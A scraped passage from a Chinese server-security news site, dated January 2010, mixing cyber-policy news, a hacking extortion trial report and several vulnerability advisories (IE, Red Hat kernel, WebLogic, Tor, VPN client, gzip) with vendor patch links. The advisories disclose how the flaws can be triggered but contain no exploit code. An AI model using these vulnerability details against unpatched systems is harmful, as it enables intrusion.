广泛，网络安全所面临的威胁也日益增加，而其他领域作战行动能否取得成功要取决于国家是否有能力控制网络，防止敌方破坏。海军信息作战司令部官员吉姆—纽 曼称，所有网络行动都具有现实意义，美国需要像打造现实军事联合指挥机构一样组建网络安全部门。     由于亚太地区地域辽阔，美国政府和军方很多机构所面临的众多挑战在这里都被放 大了许多，这其中美太平洋司令部受到的压力尤为突出。根据专家们的看法，要解决现有的难题，首先要依靠新技术的发展。太平洋司令部指挥、控制、通信与计算 机系统部（J—6）新任部长威廉姆斯—布雷特将军呼吁通信部门和作战部门之间建立一种全新的关系。作为首位担任J—6部门领导的非通信人员，威廉姆斯提出 有必要增进两方面人员的理解，“在通信和作战部门之间必须要有一种沟通渠道。指挥部门和作战部门都不会学习我们的语言，因而我们要用他们能够明白的方式表 达自己”。他提出，解决这个问题是双向的，军事部队需要有一个懂作战的通讯人员，或者了解通信的作战人员。他同时强调，网络战也是J—6部门面临的一项关 键任务。     负责太平洋司令通信与网络作战任务的美第311信号司令部指挥官艾伦—林恩指 出了美军在太平洋地区面临的众多挑战和取得的成绩，同时提出了部门对未来网络系统的期望：更廉价、更轻便、更节能、花费更少人力的综合系统，能够自动减弱 或修正工作站信息保障工作问题的智能网络，跨域多级安全解决方案，能够使两种不同网络连接且不会产生信息安全问题的即插即用型软件。     美太平洋司令部海军陆战队指挥官斯塔尔德表示，对于海军陆战队在太平洋地区执 行的任务，有些技术也是十分必要的。在他列出的清单上，语言翻译排名非常靠前，此外还包括反水雷技术、浅水监视侦察情报等。不过，排在最前面的还是应对简 易爆炸装置（IED）的相关技术。斯塔尔德表示，其属下在阿富汗战场因简易爆炸装置而丧命的数量已经超过伊拉克，如今这种致命爆炸装置已经散布到世界各 地，其中包括泰国。斯塔尔德还警告称，他认为五角大楼计划将所有语音、视频和移动通信数据都归入一个简单的互联网协议的做法是非常令人担忧的，作战环境的 不确定性将使这一做法受到威胁，他反对“将所有鸡蛋都放在一个篮子里。”他承认通常来看海军陆战队和网络战没有太多的关联，但美海军陆战队已经将网络战能 力纳入训练计划，并加大了这方面的投入，海军陆战队已经成立了网络总部。美军赴阿富汗特派陆战队空／地特遣队指挥官格伦—布朗称，海军陆战队未能接受足够 的信息系统的训练，这导致很多陆战队员到了战场还要学习如何使用指挥、控制和通信系统（C3）设备，这样一来就严重阻碍了他们在作战区域行动的效率。因 此，他呼吁海军陆战队在战场部署前接受相关的硬件和软件使用培训。     美海军有其自己优先发展的项目，美太平洋舰队副司令斯科特—巴斯科克指出，信 息系统发展首先要具备的能力是指挥、控制指挥和控制（C2C2）。他指出，C2C2的应用正在进行当中，其中包括四个要素：战区传感／情报，网络体系结 构，指挥官决策有效传递，网络保护。不过，缺少C2C2自动化工具是一个重要挑战，巴斯科克要求军工企业尽快弥补这一缺陷，“指挥、指挥控制与控制是能够 取得巨大收获的领域”。     美国太平洋舰队指挥、控制、通信、计算机和情报（C4I）部门负责人琳达—牛 顿认为C2C2系统面临不少挑战，其中包括情报架构，网络架构，决策帮助架构，对单个架构组成以及整体的保护等等。她补充道，美海军正试图开发C2C2作 战流程概念，将该系统纳入海军作战中心，继续技术开发并进行实验。应对信息系统面临日益增加的网络威胁需要有效的C2C2系统。美国国防部负责网络和信息 集成的前助理部长约翰—格兰姆斯指出，网络攻击事件每天都在发生。大约三年前，黑客就曾通过军工企业合作伙伴的网络窃取了美国一些最敏感的武器系统技术。 自那时以来，美军方采取的措施已成功地避免了类似这种方式的情报泄露。     美国海岸警卫队第14区指挥官曼森—布朗表示，太平洋战区行动使美国海岸警卫 队面临新的挑战。他在一次午餐会上告诉听众，海岸警卫队的日常任务正向太平洋深处延伸，这也使其遇到的国家安全相关挑战不断增加。例如，渔业保护就是一个 国家安全领域的问题，对于那些严重依赖渔业食品和贸易的岛屿国家来说尤为如此。如果渔业规则遭到破坏，出现过度捕捞等问题，相关国家就会受到威胁。由于认 识到就某一问题达成多国共识的难度较大，美海岸警卫队正在通过双边协议寻求在太平洋广大区域内的共同利益。布朗举例说，美国海岸警卫队将监视和侦察情报传 递太平洋岛国基里巴斯，帮助后者阻止其水域的非法捕鱼作业。（雅龙） http://www.serversteam.com/uploads/allimg/100130/211PT508-0-lp.jpg 网战,网络安全,困扰,太平洋 行业资讯 admin 未知 2010-01-30 21:15 http://www.serversteam.com/S/News/news-20100129654.html iPhone破解者GeoHot继上周宣布PS3初步破解成功后，今天再次在博客中公布了他所发现的PS3漏洞。他称，通过这个漏洞，他可以通过 其他操作系统完整访问全部内存，详细内容可以访问他的博客。 iPhone破解者GeoHot继上周宣布PS3初步破解成功后，今天再次在博客中公布了他所发现的PS3漏洞。他称，通过这个漏洞，他可以“通过 其他操作系统完整访问全部内存”，详细内容可以访问他的博客。 　　不过，据称目前为止，GeoHot的破解工作都是围绕着2.4.2版本（“is known to work with version 2.4.2 only”），如果这确实是GeoHot的破解环境的话，估计破解只不过是牺牲掉大量功能的白用功而已，要知道PSP现在破解情况已经很基本被索尼控制 住，不停的固件升级与破解界的起起伏伏，业界巨人可不是这么容易被打败的。 http://www.serversteam.com/uploads/allimg/100129/1029314941-0-lp.jpg 破解,PS3,黑客,漏洞 行业资讯 admin 未知 2010-01-29 10:28 http://www.serversteam.com/S/Vuln/vuln_653.html 受影响系统： Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.0.1 SP4 描述：BUGTRAQ ID: 37893 CVE ID: CVE-2010-0247 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 Int 受影响系统：     Microsoft Internet Explorer 6.0 SP1     Microsoft Internet Explorer 6.0     Microsoft Internet Explorer 5.0.1 SP4 描述：BUGTRAQ  ID: 37893 CVE ID: CVE-2010-0247 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 Internet Explorer访问尚未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。 <*来源：Haifei Li     链接：http://marc.info/?l=bugtraq&m=126417642811350&w=2         http://secunia.com/advisories/38209/         http://www.us-cert.gov/cas/techalerts/TA10-021A.html         http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true *> 建议：临时解决方法： * 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。 * 将Internet 和本地Intranet安全区域设置设为“高”，以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。 * 对Internet Explorer 6或Internet Explorer 7启用DEP。 厂商补丁： Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-002）以及相应补丁: MS10-002：Cumulative Security Update for Internet Explorer (978207) 链接：http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true MS10-002,Microsoft,IE,远程,内存,漏洞 漏洞公告 admin 绿盟科技 2010-01-26 09:40 http://www.serversteam.com/S/Vuln/vuln_652.html 发布日期：2010-01-20 更新日期：2010-01-25 受影响系统： RedHat Linux 5.x 描述：BUGTRAQ ID: 37875 CVE ID: CVE-2009-4272 Linux Kernel是开放源码操作系统Linux所使用的内核。 Red Hat版本的Linux Kernel的路由实现中存 发布日期：2010-01-20 更新日期：2010-01-25 受影响系统：     RedHat Linux 5.x 描述：BUGTRAQ  ID: 37875 CVE ID: CVE-2009-4272 Linux Kernel是开放源码操作系统Linux所使用的内核。 Red Hat版本的Linux Kernel的路由实现中存在两个拒绝服务漏洞。如果攻击者能够通过特制报文导致在路由哈希表中出现大量冲突以触发紧急路由flush，就会触发死锁；其次，如果禁用了内核路由缓存，在路由查询后会留下未初始化的指针，导致内核忙碌。 <*来源：Konstantin Khorenko     链接：https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=545411         https://www.redhat.com/support/errata/RHSA-2010-0046.html *> 建议：厂商补丁： RedHat ------ RedHat已经为此发布了一个安全公告（RHSA-2010:0046-01）以及相应补丁: RHSA-2010:0046-01：Important: kernel security and bug fix update 链接：https://www.redhat.com/support/errata/RHSA-2010-0046.html RedHat,Kernel,路由,拒绝服务,漏洞 漏洞公告 admin 绿盟科技 2010-01-26 09:37 http://www.serversteam.com/S/Vuln/vuln_651.html 受影响系统： RedHat Linux 5.x 描述：BUGTRAQ ID: 37876 CVE ID: CVE-2009-3556 Linux Kernel是开放源码操作系统Linux所使用的内核。 对于使用qla2xxx驱动且支持NPIV硬件的Red Hat版本的Linux Kernel系统，驱动向SCSI主机 受影响系统：     RedHat Linux 5.x 描述：BUGTRAQ  ID: 37876 CVE ID: CVE-2009-3556 Linux Kernel是开放源码操作系统Linux所使用的内核。 对于使用qla2xxx驱动且支持NPIV硬件的Red Hat版本的Linux Kernel系统，驱动向SCSI主机属性中添加了两个新的sysfs伪文件： w--w--w- root root  /sys/class/scsi_host/host1/vport_create w--w--w- root root  /sys/class/scsi_host/host1/vport_delete w--w--w- root root  /sys/class/scsi_host/host2/vport_create w--w--w- root root  /sys/class/scsi_host/host2/vport_delete  这两个文件默认完全可写（S_IWUGO/0222），本地用户可以随意更改SCSI主机属性。 <*来源：Bryn M. Reeves     链接：https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=537177         https://www.redhat.com/support/errata/RHSA-2010-0046.html *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ ls -l /sys/class/scsi_host/<a qla2xxx host>/vport_*    ls -l /sys/class/scsi_host/<a qla2xxx host>/vport_id    ls -l /sys/class/scsi_host/<a qla2xxx host>/vport_disable    ls -l /sys/class/scsi_host/<a qla2xxx host>/symbolic_port_name 实际结果： --w--w--w- root root  /sys/class/scsi_host/host1/vport_create --w--w--w- root root  /sys/class/scsi_host/host1/vport_delete --w--w--w- root root  /sys/class/scsi_host/host2/vport_create --w--w--w- root root  /sys/class/scsi_host/host2/vport_delete 预期结果： -rw-r--r-- root root  /sys/class/scsi_host/host1/vport_create -rw-r--r-- root root  /sys/class/scsi_host/host1/vport_delete -rw-r--r-- root root  /sys/class/scsi_host/host2/vport_create -rw-r--r-- root root  /sys/class/scsi_host/host2/vport_delete 建议：厂商补丁： RedHat ------ RedHat已经为此发布了一个安全公告（RHSA-2010:0046-01）以及相应补丁: RHSA-2010:0046-01：Important: kernel security and bug fix update 链接：https://www.redhat.com/support/errata/RHSA-2010-0046.html RedHat,Linux,Kernel,qla2xxx,驱动 漏洞公告 admin 绿盟科技 2010-01-26 09:37 http://www.serversteam.com/S/Vuln/vuln_650.html 受影响系统： Oracle WebLogic Server 10.3.2 描述：BUGTRAQ ID: 37926 WebLogic包含多种应用系统集成方案，包括Server/Express/Integration等。 Oracle Weblogic中可安装可选的节点管理器工具用于远程启动或终止服务 受影响系统：     Oracle WebLogic Server 10.3.2 描述：BUGTRAQ  ID: 37926 WebLogic包含多种应用系统集成方案，包括Server/Express/Integration等。 Oracle Weblogic中可安装可选的节点管理器工具用于远程启动或终止服务器例程。节点管理器运行为beasvc.exe进程，监听于5556端口。 节点管理器组件支持多个命令，其中一些命令无需任何认证，用户只需知道Weblogic域的名称便可执行这些命令。默认的Weblogic安装拥有至少两个域：wl_server和medrec。 <*来源：Evgeny Legerov （aland@freeradius.org）     链接：http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html *> 建议：厂商补丁： Oracle ------ 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.oracle.com Oracle,WebLogic,beasvc.exe,远程, 漏洞公告 admin 绿盟科技 2010-01-26 09:35 http://www.serversteam.com/S/News/news-20100126649.html 1月25日消息，据日本媒体报道，鉴于网络黑客攻击在全球日益蔓延，日本政府25日初步决定加强与美国在反黑客方面的合作。鸠山内阁成立的首次日美网络安全会议将于2月上旬在东京召开，届 1月25日消息，据日本媒体报道，鉴于网络黑客攻击在全球日益蔓延，日本政府25日初步决定加强与美国在反黑客方面的合作。鸠山内阁成立的首次“日美网络安全会议”将于2月上旬在东京召开，届时双方将交换最新信息商讨具体对策。 据日本政府相关人士透露，日本政府内阁官房和美国国土安全部负责人将出席会议。除商讨对策之外，预计双方还将就提高防范亚太地区网络攻击的意识等课题进行讨论。 美国总统奥巴马自就任以来一直强调网络攻击的威胁。去年12月奥巴马任命了全权负责政府机关黑客对策的协调官，极推进信息安全政策。 日美在2005年达成协议定期召开两国信息安全会议，但自08年11月以来会议就再未召开。去年7月美国和韩国同时遭到网络攻击，日本国内的服务器也被确认参与了攻击，表明网络黑客攻击日益严重。 日本官房长官平野博文去年年底表示“网络攻击对策是国家安全和危机管理方面重要的课题”，指示政府相关机构研究防范对策。日本政府还考虑今后同英国等欧洲国家开展合作。 日本,美国,反黑客,合作 行业资讯 admin 网易 2010-01-26 08:22 http://www.serversteam.com/S/News/news-20100126648.html 微软近日宣布，推出了紧急额外补丁，以修补IE零日安全漏洞。此前，黑客们利用这一漏洞高调地发动了多起攻击，尤其是最近向谷歌和其他一些公司发动了Trojan.Hydraq木马病毒攻击。 该漏洞会 微软近日宣布，推出了紧急额外补丁，以修补IE零日安全漏洞。此前，黑客们利用这一漏洞高调地发动了多起攻击，尤其是最近向谷歌和其他一些公司发动了Trojan.Hydraq木马病毒攻击。 该漏洞会影响到IE6、IE 7和IE8三个版本，而这三个版本是目前使用最多的浏览器版本。不过，目前赛门铁克所监测到的利用此漏洞的流行代码仅会影响IE6。 “基于我们的实地监测，目前为止，这一安全漏洞被用于具有针对性攻击的数量极为有限，但却很高调。”赛门铁克安全响应中心安全情报主管Joshua Talbot表示，“就目前所发生的攻击事件来看，最常用的攻击载体是电子邮件。这些邮件被发送给公司高级雇员，而邮件里面包含有看似合法的附件和网站链接。当附件被打开时，针对此漏洞的攻击即开始，计算机也随之被感染。” “虽然我们目前所看到的利用此漏洞进行攻击的事件很有限，但随着这种攻击代码被公诸于众，我们有理由相信会看到更多此类的攻击企图。”Talbot补充道，“可以肯定的是，有些攻击者正在加班加点地工作，制造能够感染其他IE版本（即IE7和IE8）的有攻击力的病毒。” “这种安全漏洞非常危险，因为黑客可以藉此发动远程攻击。”Talbot说，“这意味着攻击者可以利用此漏洞，随心所欲地在受害者机器上运行恶意代码。” 赛门铁克公司强烈建议用户下载补丁来修补自己系统的漏洞。此外，我们建议企业考虑实施自动化补丁管理解决方案来帮助降低风险。 下载,IE,紧急补丁,修补,零日漏洞,黑客 行业资讯 admin 未知 2010-01-26 08:15 http://www.serversteam.com/S/News/news-20100126647.html 为防流感，被告人夏云涛戴口罩出庭 摄/通讯员李钦鹏 侵入央视主持人马斌的电脑，并将隐私照片公布在互联网上进行敲诈。今天，炮制京城艳照门的夏云涛在海淀法院接受审理。 庭审现场 为防流感，被告人夏云涛戴口罩出庭 摄/通讯员李钦鹏 　　侵入央视主持人马斌的电脑，并将隐私照片公布在互联网上进行敲诈。今天，炮制京城艳照门的夏云涛在海淀法院接受审理。 　　庭审现场 　　黄色软件作诱饵“钓”到私人电脑 　　站在法庭上的夏云涛声音洪亮。 　　为防止流感，每名在押嫌疑人都被要求戴口罩出庭。即便如此，坐在法庭最后一排仍能够听清夏云涛所说的每一个字。 　　大专学历的夏云涛在案发前曾供职于某家网络公司，他对公诉机关的指控供认不讳。 　　夏云涛供述，自己当初是怀着"恶作剧"的心态：先是购买了一个黄色软件放在网上作诱饵。 　　“谁点击这个软件我就可以侵入谁的电脑程序。”此后夏云涛发现该软件招来五六个上钩者，但其中只有一个IP是来自于私人电脑，其余都来自网吧。 　　夏云涛于是侵入该私人电脑，发现一些隐私照片。“这个人怎么这么像央视的主持人？”夏云涛称。而此人正是央视主持人马斌。 　　根据从电脑里得到的马斌电话，夏云涛给马斌发了彩信，内容就是隐私照片。 　　此后，夏云涛收到了马斌的回应“你到底想怎么样”，并提出给钱来解决问题。最终两人将数额定在26万元。 　　在交易时，夏云涛并没有出现。据夏云涛讲，是担心马斌会报警。 　　此后，夏云涛将3张马斌赤裸上身的照片传到了网上，于是又收到了马斌的电话。 　　马斌表示愿意给钱解决此事，前提是要求夏云涛交出所有的隐私材料。夏云涛答应后并按时赴约，被当场抓获。 　　希望早点回来当面向马斌道歉 　　“就是一个贪字把我送到了审判席上。”在最后陈述阶段，夏云涛仍旧声音很大。 　　夏云涛表示接受法庭对他的处罚，并称：“我希望自己能早日回来，当面向马斌道歉。” 　　庭后，在被送回羁押地点的路上，夏云涛被记者团团围住。口罩挡住了夏云涛半张脸，看不清表情，只有眼睛是红红的。 　　“你知道马斌现在已经不主持节目了吗？”记者纷纷发问。夏云涛站在原地始终一语不发。 　　此后，坚决不接受采访的夏云涛匆匆离开。 　　案情回放 　　黑龙江省人夏云涛，案发前是北京东威视点影视广告有限公司经纪人主管，曾因盗窃罪被判处有期徒刑10年。 　　据检察机关指控，2008年11月的一天，被告人夏云涛在丰台区恋日嘉园一房间内，使用非法手段侵入被害人马斌位于海淀区梅地亚中心的个人电脑，获取马斌隐私生活照若干张。 　　后夏云涛以发送到互联网上相要挟，敲诈被害人马斌26万元。在海淀区梅地亚中心交易时，被告人夏云涛未出现。 　　2009年8月10日，被告人夏云涛以同样方法再次向马斌敲诈钱财未果。 　　8月12日，夏云涛被抓获归案。 http://www.serversteam.com/uploads/allimg/100126/0Q11U064-0-lp.jpg 黑客,入侵,曝光,央视,主持,不雅照 行业资讯 admin 法制晚报 2010-01-26 08:10 http://www.serversteam.com/S/News/news-20100126646.html 新华网北京1月24日电工业和信息化部发言人24日就互联网安全、黑客攻击等问题接受新华社记者专访，强调指出中国法律禁止任何形式的黑客攻击行为，中国本身就是黑客攻击的最大受害国，愿 新华网北京1月24日电工业和信息化部发言人24日就互联网安全、黑客攻击等问题接受新华社记者专访，强调指出中国法律禁止任何形式的黑客攻击行为，中国本身就是黑客攻击的最大受害国，愿就推动互联网安全和打击网络黑客攻击等违法犯罪活动加强国际合作。     记者：请您介绍一下中国遭受网络黑客攻击的情况。     工信部发言人：我国政府高度重视互联网的发展与管理。自1994年互联网正式引入我国以来，经过十几年快速发展，互联网已经成为我国重要的社会基础设施，为促进经济社会更好更快发展发挥了重要作用。但是，同世界其他国家一样，我国互联网始终面临着黑客攻击、网络病毒等违法犯罪活动的严重威胁。据有关抽样数据显示，仅2009年我国被境外控制的计算机ＩＰ地址就达100多万个，被黑客组织篡改的网站多达4．2万个；在受网络病毒威胁方面，去年我国仅被“飞客”蠕虫一种网络病毒感染的计算机数量每月就达1800万台，占全球感染主机总量的30％，位列全球第一。在上述受攻击的计算机中，不仅涉及大量网民，而且涉及金融、交通、能源等多个部门，对我经济发展和人民正常生产生活造成严重危害。可以说，我国也是网络攻击最大的受害者。     记者：请介绍中国对网络黑客攻击的态度及采取的措施。     工信部发言人：中国政府始终坚决反对任何形式的网络攻击行为。坚持依法管理，不断完善互联网管理方面的法律法规，在《刑法》《治安管理处罚法》《全国人民代表大会常务委员会关于维护互联网安全的决定》《计算机信息系统安全保护条例》《电信条例》《计算机病毒防治管理办法》等多项法律法规中，对打击网络攻击等犯罪行为作出了明确规定。2009年，我部先后出台了《互联网网络安全信息通报实施办法》和《木马和僵尸网络监测和处置机制》，先后多次组织专项治理行动，有效遏制了木马和僵尸网络传播；组织270多家单位共同开展网络安全事件的监测、预警和应急处置，国家互联网应急中心仅2009年就有效处置网络安全事件1100多起，为多家银行、电子商务网站和用户挽回了经济损失。同时，积极开展行业自律工作，指导中国互联网协会组织基础电信运营企业、网络安全厂商、增值服务提供商、搜索引擎、域名注册机构等成立了“中国反网络病毒联盟”并签署自律公约，净化了网络环境，维护公共互联网网络安全。     记者：请问我国对网络安全国际合作持什么态度？     工信部发言人：我国积极致力于在网络安全、网络反恐等方面开展国际交流合作，在亚太经合组织电信工作组中积极参与安全与繁荣工作组的各项工作，承担并完成了“应对僵尸网络治理策略和技术手段指南”，对国际电信联盟正在开展的“网络安全议程”给予了积极关注和支持；自2004年起积极参与与东盟各国的网络安全合作，多次参加东盟组织的网络安全应急演练。2009年，还分别与东盟和上合组织成员国签订了《中国－东盟电信监管理事会关于网络安全问题的合作框架》和《上合组织成员国保障国际信息安全政府间合作协定》。     记者：您对国际上一些人指责“中国政府参与黑客攻击”持何看法？     工信部发言人：互联网安全问题是一个全球性问题，需要各国加强合作，共同努力。对于反对黑客攻击的问题，中国政府的方针政策是公开透明、一以贯之的。以或明或暗的方式，指责“中国政府参与黑客攻击”是毫无根据的，是抹黑中国的行为，我们对此坚决反对。我愿再次重申，我们愿意在打击黑客攻击等违法犯罪方面与世界各国开展广泛、深入的交流合作，积极借鉴世界各国的有益经验，为建设好、管理好互联网做出积极贡献。 工信部,中国,打击,黑客,合作 行业资讯 admin 未知 2010-01-26 07:56 http://www.serversteam.com/S/News/news-20100126645.html 1月25日微软IE之前曝出的零日漏洞令全球互联网用户都惊出了一身冷汗，由于影响范围广，各大安全公司共同向所有用户预警提醒大家一定要小心该漏 洞容易被黑客利用引起远程攻击。就在上 1月25日微软IE之前曝出的零日漏洞令全球互联网用户都惊出了一身冷汗，由于影响范围广，各大安全公司共同向所有用户预警提醒大家一定要小心该漏 洞容易被黑客利用引起远程攻击。就在上周四微软刚刚发布了安全补丁修复该漏洞之后，原以为此事就这样了解。然而近日安全研究公司Core Security Technologies称，又发现了IE浏览器的一个安全漏洞，黑客如果利用这些安全漏洞将被攻击电脑联系在一起，就可以对电脑用户进行远程控制。看来 微软的麻烦还没有结束，但目前微软方面并没有对此事发表评论。  IE浏览器又被曝漏洞     Core Security Technologies公司的一位安全顾问Jorge Luis Alvarez Medina说，有三到四种实施这种攻击的方法可被利用。他将在2月2日在华盛顿召开的黑帽安全会议上演示这个安全漏洞。     Alvarez Medina说，黑客能够利用IE浏览器中的一连串的四个或者五个小的安全漏洞。目前全球有数亿台PC正使用IE浏览器，虽然这些安全漏洞没有一个足以攻 破一台PC，但是，黑客能够通过同时利用所有这些安全漏洞控制一台PC。这些安全漏洞组合在一起可以攻破IE浏览器，在用户点击一个恶意链接之后，黑客就 可以访问用户PC上保存的所有数据。     Alvarez Medina补充说，他不能肯定黑客是否已经在利用微软到目前为止还没有修复的这些安全漏洞。他说自己所在的安全研究公司正在与微软合作找到一种缓解这种风险的方法。同时，他补充到，他认为在发布这些安全漏洞的解决方案之后还会出现其它新的安全漏洞。 http://www.serversteam.com/uploads/allimg/100126/0K604GN-0-lp.jpg IE,浏览器,漏洞 行业资讯 admin 服安资讯 2010-01-26 07:53 http://www.serversteam.com/S/FAQ/faq-644.html 双机热备针对的是服务器的故障: 服务器的故障可能由各种原因引起，如设备故障、操作系统故障、软件系统故障等等。一般地讲，在技术人员在现场的情况下，恢复服务器正常可能需要１０分 双机热备针对的是服务器的故障:服务器的故障可能由各种原因引起，如设备故障、操作系统故障、软件系统故障等等。一般地讲，在技术人员在现场的情况下，恢复服务器正常可能需要１０分钟、几小时甚至几天。从实际经验上看，除非是简单地重启服务器（可能隐患仍然存在），否则往往需要几个小时以上。而如果技术人员不在现场，则恢复服务的时间就更长了。 而对于一些重要系统而言，用户是很难忍受这样长时间的服务中断的。因此，就需要通过双机热备，来避免长时间的服务中断，保证系统长期、可靠的服务。 决定是否使用双机热备，正确的方法是要分析一下系统的重要性以及对服务中断的容忍程度，以此决定是否使用双机热备。即，你的用户能容忍多长时间恢复服务，如果服务不能恢复会造成多大的影响。 在考虑双机热备时，需要注意，一般意义上的双机热备都会有一个切换过程，这个切换过程可能是一分钟左右。在切换过程中，服务是有可能短时间中断的。但是，当切换完成后，服务将正常恢复。因此，双机热备不是无缝、不中断的，但它能够保证在出现系统故障时，能够很快恢复正常的服务，业务不致受到影响。而如果没有双机热备，则一旦出现服务器故障，可能会出现几个小时的服务中断，对业务的影响就可能会很严重。 另有一点需要强调，即服务器的故障与交换机、存储设备的故障不同，其概念要高得多。原因在于服务器是比交换机、存储设备复杂得多的设备，同时也是既包括硬件、也包括操作系统、应用软件系统的复杂系统。不仅设备故障可能引起服务中断，而且软件方面的问题也可能导致服务器不能正常工作。 还应指出的是，一些其他的防护措施如磁盘阵列（RAID）、数据备份虽然是非常重要的，但却不能代替双机热备的作用。可参见相关文章：双机热备与数据备份/Raid的关系。 服务器,为什么,双机热备 常见问题 admin 服务器安全维护网 2010-01-26 07:48 http://www.serversteam.com/S/News/news-20100125643.html 1月25日消息，恒指公司昨日公布上周五(22日)开市时服务中断的调查结果。公司称服务中断是由于从数据传送专线中接收的数据，出现罕见的传送次序引起未能预见。 据香港媒体报道，恒指公司 1月25日消息，恒指公司昨日公布上周五(22日)开市时服务中断的调查结果。公司称服务中断是由于从数据传送专线中接收的数据，出现罕见的传送次序引起未能预见。 据香港媒体报道，恒指公司昨日公布上周五(22日)开市时服务中断的调查结果，确定事故原因。公司表示，服务中断是由于从数据传送专线中接收的数据，出现罕见的传送次序引起未能预见的情况。恒指公司强调，已针对有关问题进行所有调整，并进行全面测试，包括模拟上周五服务中断的相同情况，又指已于上周六(23日)参与港交所(00388)的市场演习并顺利完成。 服务,中断,恒指,公司,传送,次序,出错 行业资讯 admin 未知 2010-01-25 16:48 http://www.serversteam.com/S/Vuln/vuln_642.html 受影响系统： Tor Tor 0.2.1.22 不受影响系统： Tor Tor 0.2.1.22 描述：BUGTRAQ ID: 37901 Tor（The Onion Router）是第二代洋葱路由的一种实现，用户通过Tor可以在因特网上进行匿名交流。 如果用户向网桥目录 受影响系统：     Tor Tor < 0.2.1.22 不受影响系统：     Tor Tor 0.2.1.22 描述：BUGTRAQ  ID: 37901 Tor（The Onion Router）是第二代洋葱路由的一种实现，用户通过Tor可以在因特网上进行匿名交流。 如果用户向网桥目录权威提交了特制的查询请求，目录权威会在dbg-stability.txt的响应中泄露所有追踪的网桥身份，这是一种信息泄露。 <*来源：Roger Dingledine     链接：http://secunia.com/advisories/38198/         http://permalink.gmane.org/gmane.network.onion-routing.announce/30         http://archives.seul.org/or/talk/Jan-2010/msg00161.html *> 建议：厂商补丁： Tor --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： https://www.torproject.org/easy-download Tor,目录,查询,请求,泄露,漏洞 漏洞公告 admin 绿盟科技 2010-01-25 16:46 http://www.serversteam.com/S/Vuln/vuln_641.html 受影响系统： TheGreenBow VPN Client 4.61.003 TheGreenBow VPN Client 4.51.001 描述：TheGreenBow VPN Client是基于标准的VPN客户端，兼容各种常见的VPN网关。 TTheGreenBow VPN客户端在处理tgb策略文件的OpenScriptAfterUp字 受影响系统：     TheGreenBow VPN Client 4.61.003      TheGreenBow VPN Client 4.51.001 描述：TheGreenBow VPN Client是基于标准的VPN客户端，兼容各种常见的VPN网关。 TTheGreenBow VPN客户端在处理tgb策略文件的OpenScriptAfterUp字段时存在栈溢出漏洞，用户受骗打开了畸形的.tgb文件就可以触发这个溢出，导致执行任意指令。 <*来源：Brett Gervasoni     链接：http://secunia.com/advisories/38262/         http://marc.info/?l=bugtraq&m=126409341206535&w=2 *> 建议：厂商补丁： TheGreenBow ----------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.thegreenbow.com/vpn.html TheGreenBow,VPN,客户端,tgb,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-01-25 16:45 http://www.serversteam.com/S/Vuln/vuln_640.html 受影响系统： GNU gzip 1.x 不受影响系统： GNU gzip 1.4 描述：BUGTRAQ ID: 37886 CVE ID: CVE-2010-0001 gzip是一款非常流行的文件压缩工具。 gzip的unlzw.c文件中的unlzw()函数在解压特制Lempel-Ziv-Welch（LZW）压缩文 受影响系统：     GNU gzip 1.x 不受影响系统：     GNU gzip 1.4 描述：BUGTRAQ  ID: 37886 CVE ID: CVE-2010-0001 gzip是一款非常流行的文件压缩工具。 gzip的unlzw.c文件中的unlzw()函数在解压特制Lempel-Ziv-Welch（LZW）压缩文件时存在整数下溢漏洞，用户受骗将特制的LZW压缩gzip文档解压到本地就会导致gzip崩溃或以当前用户权限执行任意指令。 <*来源：Aki Helin     链接：http://secunia.com/advisories/38220/         http://www.ubuntu.com/usn/USN-889-1         https://www.redhat.com/support/errata/RHSA-2010-0061.html         http://www.debian.org/security/2010/dsa-1974 *> 建议：厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1974-1）以及相应补丁: DSA-1974-1：New gzip packages fix arbitrary code execution 链接：http://www.debian.org/security/2010/dsa-1974 补丁下载： Source archives: http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1.dsc Size/MD5 checksum:      573 4a4c81d72ed695f7e0b710fa7da00201 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1.diff.gz Size/MD5 checksum:    62547 34c6cab73195a3b9e2b187636cf69dc2 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5.orig.tar.gz Size/MD5 checksum:   331550 3d6c191dfd2bf307014b421c12dc8469 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_alpha.deb Size/MD5 checksum:    84202 2677656b86d648a05b54ba0c03028eb1 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_amd64.deb Size/MD5 checksum:    76988 86e571b7bf22e4924c5d7f82306ab064 arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_arm.deb Size/MD5 checksum:    79428 7e71e302f090a62f52b7f6f5d35b627b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_hppa.deb Size/MD5 checksum:    81616 02d1712f3f62de9f05810cd3a1660d77 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_i386.deb Size/MD5 checksum:    74324 ac441b57b7423d65985acaef2e40df9f ia64 architecture (Intel 